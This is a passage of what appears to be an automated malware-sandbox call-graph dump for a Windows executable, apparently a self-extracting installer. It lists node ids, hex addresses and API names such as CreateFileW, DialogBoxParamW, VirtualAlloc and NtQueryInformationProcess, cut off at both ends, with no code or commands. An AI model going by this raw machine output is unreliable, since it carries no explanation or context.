4f8a5f 42616 4f8ab6 42610->42616 42629 4f8a6a 42610->42629 42611 4f8992 42611->42610 42618 4f89e1 42611->42618 42612 4f898b 42887 4f2021 23 API calls 42612->42887 42615->42601 42615->42609 42615->42611 42615->42612 42885 4f8117 24 API calls 42615->42885 42886 4f2021 23 API calls 42615->42886 42621 4f8a4c 42616->42621 42890 4f7fc0 32 API calls 42616->42890 42617 4f8ab4 42622 4f959a 25 API calls 42617->42622 42618->42621 42623 4fa231 2 API calls 42618->42623 42626 4f8b14 42618->42626 42619 4f9105 42620 4f959a 25 API calls 42619->42620 42620->42601 42621->42617 42621->42626 42622->42601 42625 4f8a19 42623->42625 42625->42621 42888 4f92a3 32 API calls 42625->42888 42626->42619 42638 4f8b82 42626->42638 42891 4f98bc 42626->42891 42627 4fab1a UnhandledExceptionFilter 42630 4f8bd1 42627->42630 42629->42617 42889 4f7db2 32 API calls 42629->42889 42633 4fab1a UnhandledExceptionFilter 42630->42633 42648 4f8be7 42633->42648 42636 4f8b70 42895 4f6e98 23 API calls 42636->42895 42638->42627 42639 4f8cbc 42640 4f8d18 42639->42640 42641 4f8e40 42639->42641 42642 4f8d8a 42640->42642 42645 4f8d28 42640->42645 42643 4f8e66 42641->42643 42644 4f8e52 42641->42644 42664 4f8d49 42641->42664 42652 4f8167 2 API calls 42642->42652 42647 503377 26 API calls 42643->42647 42646 4f9215 27 API calls 42644->42646 42649 4f8d6e 42645->42649 42656 4f8d37 42645->42656 42646->42664 42650 4f8e7f 42647->42650 42648->42639 42651 4f8c93 42648->42651 42658 4f981a 24 API calls 42648->42658 42649->42664 42898 4f77b8 33 API calls 42649->42898 42901 503020 27 API calls 42650->42901 42651->42639 42896 4f9a3c 26 API calls 42651->42896 42655 4f8dbd 42652->42655 42660 4f8de6 42655->42660 42661 4f8df5 42655->42661 42655->42664 42897 4f2021 23 API calls 42656->42897 42658->42651 42899 4f7542 27 API calls 42660->42899 42900 4f9155 28 API calls __EH_prolog 42661->42900 42669 4f8f85 42664->42669 42902 4f2021 23 API calls 42664->42902 42666 4f9090 42666->42619 42668 4fa4ed SetFileAttributesW 42666->42668 42667 4f903e 42879 4f9da2 42667->42879 42670 4f90eb 42668->42670 42669->42619 42669->42666 42669->42667 42878 4f9f09 SetEndOfFile 42669->42878 42670->42619 42903 4f2021 23 API calls 42670->42903 42673 4f9085 42674 4f9620 24 API calls 42673->42674 42674->42666 42676 4f90fb 42904 4f6dcb 23 API calls _wcschr 42676->42904 42679 4f16a4 42678->42679 42920 4fcee1 42679->42920 42688 4f9f59 42687->42688 42690 4f9f63 42688->42690 42928 4f6d0c 23 API calls 42688->42928 42690->42517 42692 4fb50f __EH_prolog 42691->42692 42697 4ff1d0 23 API calls 42692->42697 42694 4fb521 42698 4fb61e 42694->42698 42697->42694 42699 4fb630 _abort 42698->42699 42702 5010dc 42699->42702 42705 50109e 42702->42705 42706 5010b1 42705->42706 42709 4ae685b NtQueryInformationProcess GetSystemInfo 42706->42709 42707 4fb597 42707->42548 42709->42707 42715 4f1732 42710->42715 42712 4f13d6 42712->42567 42713->42565 42714->42561 42716 4f1748 42715->42716 42717 4f17a0 __InternalCxxFrameHandler 42715->42717 42718 4f1771 42716->42718 42728 4f6c36 23 API calls __vswprintf_c_l 42716->42728 42717->42712 42720 4f17c7 42718->42720 42725 4f178d ___std_exception_copy 42718->42725 42722 513e3e 2 API calls 42720->42722 42721 4f1767 42729 4f6ca7 23 API calls 42721->42729 42724 4f17ce 42722->42724 42724->42717 42731 4f6ca7 23 API calls 42724->42731 42725->42717 42730 4f6ca7 23 API calls 42725->42730 42728->42721 42729->42718 42730->42717 42731->42717 42733 4fcf4d 42732->42733 42735 4fcf54 42732->42735 42736 4f981a 42733->42736 42735->42570 42737 4f9833 42736->42737 42739 4f9e80 24 API calls 42737->42739 42738 4f9865 42738->42735 42739->42738 42741 50de78 42740->42741 42742 4fe617 7 API calls 42741->42742 42743 50de9b 42742->42743 42744 4f4092 _swprintf 5 API calls 42743->42744 42745 50dead 42744->42745 42746 50d4d4 16 API calls 42745->42746 42747 501b7c 42746->42747 42747->42525 42749 4f19bf 42748->42749 42751 4f19bb 42748->42751 42752 4f18f6 42749->42752 42751->42577 42753 4f1908 42752->42753 42754 4f1945 42752->42754 42755 4f3b2d 25 API calls 42753->42755 42760 4f3fa3 42754->42760 42758 4f1928 42755->42758 42758->42751 42763 4f3fac 42760->42763 42761 4f3b2d 25 API calls 42761->42763 42762 4f1966 42762->42758 42764 4f1e50 42762->42764 42763->42761 42763->42762 42765 4f1e5a __EH_prolog 42764->42765 42774 4f3bba 42765->42774 42767 4f1e84 42768 4f1732 23 API calls 42767->42768 42771 4f1f0b 42767->42771 42769 4f1e9b 42768->42769 42802 4f18a9 23 API calls 42769->42802 42771->42758 42772 4f1eb3 _wcslen 42803 4f18a9 23 API calls 42772->42803 42775 4f3bc4 __EH_prolog 42774->42775 42776 4f3bda 42775->42776 42777 4f3bf6 42775->42777 42827 4f138b 23 API calls 42776->42827 42779 4f3e51 42777->42779 42782 4f3c22 42777->42782 42842 4f138b 23 API calls 42779->42842 42781 4f3be5 42781->42767 42782->42781 42804 503377 42782->42804 42784 4f3d2e 42814 4fab1a 42784->42814 42785 4f3ca3 42785->42784 42801 4f3c9a 42785->42801 42830 4fd051 42785->42830 42786 4f3c9f 42786->42785 42829 4f20bd 23 API calls 42786->42829 42788 4f3c8f 42828 4f138b 23 API calls 42788->42828 42789 4f3c71 42789->42785 42789->42786 42789->42788 42792 4f3d41 42795 4f3dd7 42792->42795 42796 4f3dc7 42792->42796 42836 503020 27 API calls 42795->42836 42818 4f9215 42796->42818 42799 4f3dd5 42799->42801 42837 4f2021 23 API calls 42799->42837 42838 502297 42801->42838 42802->42772 42803->42771 42805 50338c 42804->42805 42807 503396 ___std_exception_copy 42804->42807 42843 4f6ca7 23 API calls 42805->42843 42808 50341c 42807->42808 42810 503440 _abort 42807->42810 42811 5034c6 _com_raise_error 42807->42811 42844 5032aa 26 API calls 3 library calls 42808->42844 42810->42789 42813 503524 42811->42813 42845 503106 26 API calls 42811->42845 42813->42789 42815 4fab28 42814->42815 42817 4fab32 42814->42817 42816 50eb38 UnhandledExceptionFilter 42815->42816 42816->42817 42817->42792 42819 4f921f __EH_prolog 42818->42819 42820 4f13ba 23 API calls 42819->42820 42821 4f9231 42820->42821 42846 4fd114 42821->42846 42823 4f928a 42823->42799 42825 4fd114 26 API calls 42826 4f9243 42825->42826 42826->42823 42826->42825 42853 4fd300 24 API calls __InternalCxxFrameHandler 42826->42853 42827->42781 42828->42801 42829->42785 42831 4fd084 42830->42831 42832 4fd072 42830->42832 42855 4f603a 23 API calls 42831->42855 42854 4f603a 23 API calls 42832->42854 42835 4fd07c 42835->42784 42836->42799 42837->42801 42839 5022a1 42838->42839 42841 5022c1 42839->42841 42856 500eed 23 API calls 42839->42856 42842->42781 42843->42807 42844->42810 42845->42811 42850 4fd12a __InternalCxxFrameHandler 42846->42850 42847 4fd29a 42848 4fd0cb 6 API calls 42847->42848 42851 4fd291 42847->42851 42848->42851 42849 508c8d 25 API calls 42849->42850 42850->42847 42850->42849 42850->42851 42852 4fac05 23 API calls 42850->42852 42851->42826 42852->42850 42853->42826 42854->42835 42855->42835 42856->42841 42857->42587 42858->42587 42859->42584 42861 4f5d2a 42860->42861 42905 4f5c4b 42861->42905 42863 4f5d5d 42865 4f5d95 42863->42865 42910 4fb1dc CharUpperW _wcslen ___vcrt_InitializeCriticalSectionEx 42863->42910 42865->42602 42867 4f8186 42866->42867 42868 4f8232 42867->42868 42917 4fbe5e CharUpperW UnhandledExceptionFilter __InternalCxxFrameHandler 42867->42917 42916 501fac CharUpperW 42868->42916 42871 4f823b 42871->42605 42873 4f7c22 42872->42873 42874 4f7c5a 42873->42874 42918 4f6e7a 23 API calls 42873->42918 42874->42615 42876 4f7c52 42919 4f138b 23 API calls 42876->42919 42878->42667 42880 4f9db3 42879->42880 42881 4f9e3f SetFileTime 42880->42881 42881->42673 42882->42594 42883->42601 42884->42601 42885->42615 42886->42615 42887->42611 42888->42621 42889->42617 42890->42621 42892 4f98c5 GetFileType 42891->42892 42893 4f8b5a 42891->42893 42892->42893 42893->42638 42894 4f2021 23 API calls 42893->42894 42894->42636 42895->42638 42896->42639 42897->42664 42898->42664 42899->42664 42900->42664 42901->42664 42902->42669 42903->42676 42904->42619 42911 4f5b48 42905->42911 42908 4f5b48 CharUpperW 42909 4f5c6c 42908->42909 42909->42863 42910->42863 42913 4f5b52 42911->42913 42912 4f5c3a 42912->42908 42912->42909 42913->42912 42915 4fb1dc CharUpperW _wcslen ___vcrt_InitializeCriticalSectionEx 42913->42915 42915->42913 42916->42871 42917->42868 42918->42876 42919->42874 42921 4fcef2 42920->42921 42926 4fa99e 23 API calls 42921->42926 42923 4fcf24 42927 4fa99e 23 API calls 42923->42927 42925 4fcf2f 42926->42923 42927->42925 42928->42690 42930 4fa6a8 42929->42930 42931 4fa6c1 FindFirstFileW 42930->42931 42934 4fa6fe 42930->42934 42932 4fa6d0 42931->42932 42931->42934 42933 4fa6e4 FindFirstFileW 42932->42933 42932->42934 42933->42934 42934->42537 42935->42394 42936->42394 42937->42397 42939 4f9f42 23 API calls 42938->42939 42940 4f1fe8 42939->42940 42941 4f1a04 25 API calls 42940->42941 42944 4f2005 42940->42944 42942 4f1ff5 42941->42942 42942->42944 42945 4f138b 23 API calls 42942->42945 42944->42410 42944->42411 42945->42944 42947 50b583 GetMessageW 42946->42947 42948 50b5bc GetDlgItem 42946->42948 42949 50b5a8 TranslateMessage DispatchMessageW 42947->42949 42950 50b599 IsDialogMessageW 42947->42950 42948->42421 42948->42422 42949->42948 42950->42948 42950->42949 41555 5198f0 41563 51adaf 41555->41563 41557 519904 41561 519919 41566 51add6 _unexpected 41563->41566 41565 5198fa 41565->41557 41567 519869 41565->41567 41583 50fbbc 41566->41583 41568 519874 41567->41568 41569 519888 41568->41569 41595 51ae5b UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 41568->41595 41578 5198a8 41569->41578 41589 51b136 41569->41589 41573 5198a2 41596 518dcc 41573->41596 41576 5198b7 41576->41573 41577 5198be 41576->41577 41602 519649 UnhandledExceptionFilter RtlFreeHeap _unexpected 41577->41602 41578->41561 41582 519920 UnhandledExceptionFilter 41578->41582 41580 5198c9 41581 518dcc _free 2 API calls 41580->41581 41581->41578 41582->41557 41584 50fbc4 41583->41584 41585 50fbc5 41583->41585 41584->41565 41588 50fbca UnhandledExceptionFilter 41585->41588 41587 50fcea 41587->41565 41588->41587 41593 51b143 _unexpected 41589->41593 41590 51b183 41604 5191a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41590->41604 41592 51989a 41592->41573 41601 51aeb1 UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 41592->41601 41593->41590 41593->41592 41603 517a5e UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 41593->41603 41595->41569 41597 518dd7 RtlFreeHeap 41596->41597 41600 518df2 _free 41596->41600 41598 518dec 41597->41598 41597->41600 41605 5191a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41598->41605 41600->41578 41601->41576 41602->41580 41603->41593 41604->41592 41605->41600 41606 51bb30 41607 51bb39 41606->41607 41608 51bb42 41606->41608 41610 51ba27 41607->41610 41630 5197e5 41610->41630 41614 51ba3c 41655 51b7bb 41614->41655 41617 51ba53 41617->41608 41621 518dcc _free 2 API calls 41621->41617 41623 51ba91 41671 5191a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41623->41671 41625 51ba96 41625->41621 41626 51baae 41627 51bada 41626->41627 41628 518dcc _free 2 API calls 41626->41628 41627->41625 41672 51b691 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter 41627->41672 41628->41627 41631 5197ef 41630->41631 41632 519801 41631->41632 41673 51ae5b UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 41631->41673 41634 51b136 _unexpected 2 API calls 41632->41634 41636 519850 41632->41636 41635 519813 41634->41635 41640 51981b 41635->41640 41674 51aeb1 UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 41635->41674 41648 51bb4e 41636->41648 41638 519830 41638->41640 41641 519837 41638->41641 41639 518dcc _free 2 API calls 41642 519821 41639->41642 41640->41639 41675 519649 UnhandledExceptionFilter RtlFreeHeap _unexpected 41641->41675 41642->41636 41676 518d24 5 API calls _abort 41642->41676 41644 519842 41645 518dcc _free 2 API calls 41644->41645 41645->41642 41649 51bb5a ___scrt_is_nonwritable_in_current_image 41648->41649 41650 5197e5 _unexpected 5 API calls 41649->41650 41651 51bb64 _abort __fassign 41650->41651 41652 51bbe8 _abort 41651->41652 41654 518dcc _free 2 API calls 41651->41654 41677 518d24 5 API calls _abort 41651->41677 41652->41614 41654->41651 41678 514636 41655->41678 41658 518e06 41659 518e44 41658->41659 41660 518e14 _unexpected 41658->41660 41689 5191a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41659->41689 41660->41659 41662 518e42 41660->41662 41688 517a5e UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 41660->41688 41662->41625 41664 51bbf0 41662->41664 41665 51b7bb 5 API calls 41664->41665 41670 51bc0f _abort 41665->41670 41666 51bc16 41667 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41666->41667 41668 51ba89 41667->41668 41668->41623 41668->41626 41670->41666 41690 51b893 41670->41690 41671->41625 41672->41625 41673->41632 41674->41638 41675->41644 41679 514653 41678->41679 41680 514649 41678->41680 41679->41680 41681 5197e5 _unexpected 5 API calls 41679->41681 41680->41617 41680->41658 41682 514674 41681->41682 41686 51993a 5 API calls __fassign 41682->41686 41684 51468d 41687 519967 5 API calls __fassign 41684->41687 41686->41684 41687->41680 41688->41660 41689->41662 41691 51b8be 41690->41691 41692 51b977 41691->41692 41700 51c988 41691->41700 41695 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41692->41695 41697 51ba23 41695->41697 41697->41666 41699 51ab78 __vswprintf_c_l 5 API calls 41699->41692 41701 514636 __fassign 5 API calls 41700->41701 41702 51c9a8 41701->41702 41703 51ca7e 41702->41703 41706 518e06 __vswprintf_c_l 2 API calls 41702->41706 41708 51ca07 _abort __vsnwprintf_l 41702->41708 41704 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41703->41704 41705 51b92e 41704->41705 41709 51ab78 41705->41709 41706->41708 41714 51abc3 UnhandledExceptionFilter RtlFreeHeap _free 41708->41714 41710 514636 __fassign 5 API calls 41709->41710 41711 51ab8b 41710->41711 41715 51a95b 41711->41715 41714->41703 41717 51a976 __vswprintf_c_l 41715->41717 41716 51ab50 41718 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41716->41718 41717->41716 41720 518e06 __vswprintf_c_l 2 API calls 41717->41720 41722 51a9e7 __vsnwprintf_l 41717->41722 41719 51ab63 41718->41719 41719->41699 41720->41722 41721 51aa9c 41744 51abc3 UnhandledExceptionFilter RtlFreeHeap _free 41721->41744 41722->41721 41737 51af6c 41722->41737 41726 51aa73 41726->41721 41728 51af6c __vswprintf_c_l UnhandledExceptionFilter 41726->41728 41727 51aaab 41730 518e06 __vswprintf_c_l 2 API calls 41727->41730 41733 51aacc __vsnwprintf_l 41727->41733 41728->41721 41729 51ab41 41743 51abc3 UnhandledExceptionFilter RtlFreeHeap _free 41729->41743 41730->41733 41731 51af6c __vswprintf_c_l UnhandledExceptionFilter 41734 51ab20 41731->41734 41733->41729 41733->41731 41734->41729 41735 51ab6f 41734->41735 41745 51abc3 UnhandledExceptionFilter RtlFreeHeap _free 41735->41745 41738 51af93 _unexpected 41737->41738 41740 51af9c 41738->41740 41746 51aff4 UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected __vswprintf_c_l 41738->41746 41741 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41740->41741 41742 51aa60 41741->41742 41742->41721 41742->41726 41742->41727 41743->41721 41744->41716 41745->41721 41746->41740 41747 51abf0 41748 51abfb 41747->41748 41750 51ac20 41748->41750 41751 51af0a 41748->41751 41753 51af31 _unexpected 41751->41753 41752 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41754 51af66 41752->41754 41753->41752 41754->41748 41755 50f3b2 41756 50f3be ___scrt_is_nonwritable_in_current_image 41755->41756 41783 50eed7 41756->41783 41758 50f3c5 41759 50f518 41758->41759 41762 50f3ef 41758->41762 41835 50f838 UnhandledExceptionFilter _abort 41759->41835 41761 50f51f 41829 517f58 41761->41829 41774 50f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 41762->41774 41787 518aed 41762->41787 41769 50f40e 41772 50f48f 41795 518a3e UnhandledExceptionFilter GetPEB RtlFreeHeap UnhandledExceptionFilter RtlExitUserProcess 41772->41795 41774->41772 41832 517af4 5 API calls 2 library calls 41774->41832 41775 50f49d 41796 50df1e 41775->41796 41778 50f4aa 41778->41761 41779 50f4b5 41778->41779 41780 50f4be 41779->41780 41833 517efb UnhandledExceptionFilter GetPEB RtlFreeHeap RtlExitUserProcess _abort 41779->41833 41834 50f048 UnhandledExceptionFilter ___scrt_uninitialize_crt 41780->41834 41784 50eee0 41783->41784 41786 50eef5 ___scrt_uninitialize_crt 41784->41786 41837 518977 41784->41837 41786->41758 41789 518b04 41787->41789 41788 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41790 50f408 41788->41790 41789->41788 41790->41769 41791 518a91 41790->41791 41792 518ac0 41791->41792 41793 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41792->41793 41794 518ae9 41793->41794 41794->41774 41795->41775 41844 500863 41796->41844 41798 50df2e 41859 50ac16 41798->41859 41800 50df46 _abort 41807 50dfbc 41800->41807 41864 50c5c4 41800->41864 41803 50dfe0 41869 50dbde 41803->41869 41873 4f4092 41807->41873 41808 50df76 __InternalCxxFrameHandler 41808->41807 41809 50dbde SetEnvironmentVariableW 41808->41809 41809->41807 41814 50e098 41898 5090b7 41814->41898 41817 5090b7 UnhandledExceptionFilter 41818 50e0aa DialogBoxParamW 41817->41818 41819 50e0e4 41818->41819 41822 50e10b 41819->41822 41904 50ae2f SetCurrentDirectoryW _abort _wcslen 41819->41904 41821 50e12a DeleteObject 41823 50e146 41821->41823 41824 50e13f DeleteObject 41821->41824 41822->41821 41825 50e17d 41823->41825 41905 50dc3b PeekMessageW GetMessageW TranslateMessage DispatchMessageW 41823->41905 41824->41823 41901 50ac7c 41825->41901 41828 50e1c3 41828->41778 42096 517cd5 41829->42096 41832->41772 41833->41780 41834->41769 41835->41761 41840 51c05a 41837->41840 41843 51c073 41840->41843 41841 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41842 518986 41841->41842 41842->41786 41843->41841 41846 50086d 41844->41846 41847 500b54 41846->41847 41906 5175fb 5 API calls 2 library calls 41846->41906 41848 500c94 GetFileAttributesW 41847->41848 41849 500cac 41847->41849 41848->41847 41848->41849 41850 500d73 41849->41850 41852 500d0d 41849->41852 41858 500d5e _wcslen 41849->41858 41851 4f4092 _swprintf 5 API calls 41850->41851 41851->41858 41907 4fe617 41852->41907 41855 4f4092 _swprintf 5 API calls 41856 500d4f 41855->41856 41857 4fe617 7 API calls 41856->41857 41857->41858 41858->41798 41931 50081b 41859->41931 41861 50ac2a OleInitialize 41862 50ac4d 41861->41862 41863 50ac6b SHGetMalloc 41862->41863 41863->41800 41868 50c5ce 41864->41868 41865 50c6e4 41865->41803 41865->41808 41867 501fac CharUpperW 41867->41868 41868->41865 41868->41867 41933 4ff3fa 23 API calls 2 library calls 41868->41933 41871 50dbeb 41869->41871 41870 50dc36 41870->41807 41871->41870 41872 50dc2a SetEnvironmentVariableW 41871->41872 41872->41870 41934 4f4065 41873->41934 41876 50b6dd LoadBitmapW 41877 50b70b GetObjectW 41876->41877 41878 50b6fe 41876->41878 41880 50b71a 41877->41880 41968 50a6c2 41878->41968 41963 50a5c6 41880->41963 41881 50b705 41881->41877 41881->41880 41884 50b770 41895 4fda42 41884->41895 41885 50b74c 41974 50a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 41885->41974 41887 50a6c2 2 API calls 41889 50b73d 41887->41889 41888 50b754 41975 50a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 41888->41975 41889->41885 41891 50b743 DeleteObject 41889->41891 41891->41885 41892 50b75d 41976 50a80c 8 API calls 41892->41976 41894 50b764 DeleteObject 41894->41884 41981 4fda67 41895->41981 41897 4fda4e 41897->41814 42091 50eb38 41898->42091 41900 5090d6 41900->41817 41902 50acab 41901->41902 41903 50acb5 OleUninitialize 41902->41903 41903->41828 41904->41822 41905->41825 41906->41847 41908 4fe627 41907->41908 41911 4fe648 41908->41911 41917 4fd9b0 41911->41917 41914 4fe66b LoadStringW 41915 4fe645 41914->41915 41916 4fe682 LoadStringW 41914->41916 41915->41855 41916->41915 41922 4fd8ec 41917->41922 41919 4fd9cd 41920 4fd9e2 41919->41920 41928 4fd9f0 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter 41919->41928 41920->41914 41920->41915 41923 4fd904 41922->41923 41927 4fd984 _strncpy 41922->41927 41926 4fd959 41923->41926 41929 4fe5b1 5 API calls __vsnprintf 41923->41929 41930 516159 3 API calls 3 library calls 41926->41930 41927->41919 41928->41920 41929->41926 41930->41927 41932 500828 41931->41932 41932->41861 41933->41868 41935 4f407c __vswprintf_c_l 41934->41935 41938 515fd4 41935->41938 41941 514097 41938->41941 41942 5140d7 41941->41942 41943 5140bf 41941->41943 41942->41943 41945 5140df 41942->41945 41958 5191a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41943->41958 41947 514636 __fassign 5 API calls 41945->41947 41946 5140c4 41959 519087 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 41946->41959 41948 5140ef 41947->41948 41960 514601 UnhandledExceptionFilter RtlFreeHeap __vswprintf_c_l _free 41948->41960 41951 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41953 4f4086 LoadIconW 41951->41953 41952 514167 41961 5149e6 5 API calls 4 library calls 41952->41961 41953->41876 41956 514172 41962 5146b9 UnhandledExceptionFilter RtlFreeHeap _free 41956->41962 41957 5140cf 41957->41951 41958->41946 41959->41957 41960->41952 41961->41956 41962->41957 41977 50a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 41963->41977 41965 50a5cd 41967 50a5d9 41965->41967 41978 50a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 41965->41978 41967->41884 41967->41885 41967->41887 41969 50a6db 41968->41969 41970 50a722 GlobalAlloc 41969->41970 41973 50a776 41969->41973 41971 50a73d __InternalCxxFrameHandler 41970->41971 41970->41973 41971->41973 41979 50a626 74096BB0 41971->41979 41973->41881 41974->41888 41975->41892 41976->41894 41977->41965 41978->41967 41980 50a638 41979->41980 41980->41973 41982 4fda75 _wcschr __EH_prolog 41981->41982 42019 4f98e0 41982->42019 41984 4fdb31 42023 516310 41984->42023 41988 4fdb44 41991 516310 3 API calls 41988->41991 41989 4fdb05 41989->41984 41990 4fe261 23 API calls 41989->41990 42000 4fdd4a 41989->42000 41990->41989 41999 4fdb56 ___vcrt_InitializeCriticalSectionEx 41991->41999 41992 4fdc85 41992->42000 42058 4f9d70 25 API calls 41992->42058 41996 4fdc9f ___std_exception_copy 41997 4f9bd0 25 API calls 41996->41997 41996->42000 42016 4fdcc8 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 41997->42016 41999->41992 41999->42000 42037 4f9e80 41999->42037 42052 4f9bd0 41999->42052 42057 4f9d70 25 API calls 41999->42057 42045 4f959a 42000->42045 42001 4fe159 42005 4fe1de 42001->42005 42064 518cce UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42001->42064 42003 4fe16e 42065 517625 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42003->42065 42006 4fe214 42005->42006 42012 4fe261 23 API calls 42005->42012 42010 516310 3 API calls 42006->42010 42008 4fe1c6 42066 4fe27c 23 API calls 42008->42066 42011 4fe22d 42010->42011 42013 516310 3 API calls 42011->42013 42012->42005 42013->42000 42016->42000 42016->42001 42059 4fe5b1 5 API calls __vsnprintf 42016->42059 42060 516159 3 API calls 3 library calls 42016->42060 42061 518cce UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42016->42061 42062 517625 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42016->42062 42063 4fe27c 23 API calls 42016->42063 42020 4f98ea 42019->42020 42021 4f994b CreateFileW 42020->42021 42022 4f996c 42021->42022 42022->41989 42024 516349 42023->42024 42025 51634d 42024->42025 42036 516375 42024->42036 42067 5191a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 42025->42067 42027 516352 42068 519087 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter ___std_exception_copy 42027->42068 42028 516699 42030 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 42028->42030 42032 5166a6 42030->42032 42031 51635d 42033 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 42031->42033 42032->41988 42035 516369 42033->42035 42035->41988 42036->42028 42069 516230 UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 42036->42069 42038 4f9ea5 42037->42038 42039 4f9e92 42037->42039 42040 4f9eb0 42038->42040 42042 4f9eb8 SetFilePointer 42038->42042 42039->42040 42070 4f6d5b 23 API calls 42039->42070 42040->41999 42042->42040 42043 4f9ed4 42042->42043 42043->42040 42071 4f6d5b 23 API calls 42043->42071 42046 4f95be 42045->42046 42051 4f95cf 42045->42051 42047 4f95ca 42046->42047 42048 4f95d1 42046->42048 42046->42051 42072 4f974e 42047->42072 42077 4f9620 42048->42077 42051->41897 42053 4f9bdc 42052->42053 42055 4f9be3 42052->42055 42053->41999 42055->42053 42056 4f9785 ReadFile GetFileType 42055->42056 42090 4f6d1a 23 API calls 42055->42090 42056->42055 42057->41999 42058->41996 42059->42016 42060->42016 42061->42016 42062->42016 42063->42016 42064->42003 42065->42008 42066->42005 42067->42027 42068->42031 42069->42036 42070->42038 42071->42040 42073 4f9757 42072->42073 42074 4f9781 42072->42074 42073->42074 42083 4fa1e0 42073->42083 42074->42051 42076 4f977f 42076->42051 42078 4f964a 42077->42078 42079 4f962c 42077->42079 42080 4f9669 42078->42080 42089 4f6bd5 23 API calls 42078->42089 42079->42078 42081 4f9638 FindCloseChangeNotification 42079->42081 42080->42051 42081->42078 42087 50ec50 42083->42087 42086 4fa200 42086->42076 42088 4fa1ed DeleteFileW 42087->42088 42088->42086 42089->42080 42090->42055 42092 50eb3d ___std_exception_copy 42091->42092 42094 50eb57 _com_raise_error 42092->42094 42095 517a5e UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 42092->42095 42094->41900 42095->42092 42097 517ce1 _abort _unexpected 42096->42097 42101 517cf9 _abort 42097->42101 42121 517e73 42097->42121 42098 517d9f _abort 42102 517de8 42098->42102 42103 517dbc 42098->42103 42100 517d76 42104 517d8e 42100->42104 42108 518a91 _abort UnhandledExceptionFilter 42100->42108 42101->42098 42101->42100 42125 5187e0 UnhandledExceptionFilter RtlFreeHeap _abort 42101->42125 42126 522390 UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 42102->42126 42112 517dee 42103->42112 42109 518a91 _abort UnhandledExceptionFilter 42104->42109 42108->42104 42109->42098 42127 51b076 42112->42127 42115 517e0c 42117 517e73 _abort UnhandledExceptionFilter 42115->42117 42116 517dfc GetPEB 42116->42115 42118 517e24 42117->42118 42131 4ae66f1 RtlExitUserProcess 42118->42131 42122 517e99 42121->42122 42123 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 42122->42123 42124 517ed9 42123->42124 42124->42101 42125->42100 42130 51b091 _unexpected 42127->42130 42128 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 42129 517df8 42128->42129 42129->42115 42129->42116 42130->42128 42132 517e2e 42131->42132 42951 50dec2 42952 50decf 42951->42952 42953 4fe617 7 API calls 42952->42953 42954 50dedc 42953->42954 42955 4f4092 _swprintf 5 API calls 42954->42955 42956 50def1 SetDlgItemTextW 42955->42956 42957 50b568 5 API calls 42956->42957 42958 50df0e 42957->42958 42959 4f9f7a 42960 4f9f88 42959->42960 42962 4f9f8f 42959->42962 42961 4fa003 WriteFile 42961->42962 42962->42960 42962->42961 42964 4fa095 42962->42964 42966 4f6baa 23 API calls 42962->42966 42967 4f6e98 23 API calls 42964->42967 42966->42962 42967->42960 42968 6d4598 42969 6d45a5 VirtualAlloc 42968->42969 42133 50cd58 42136 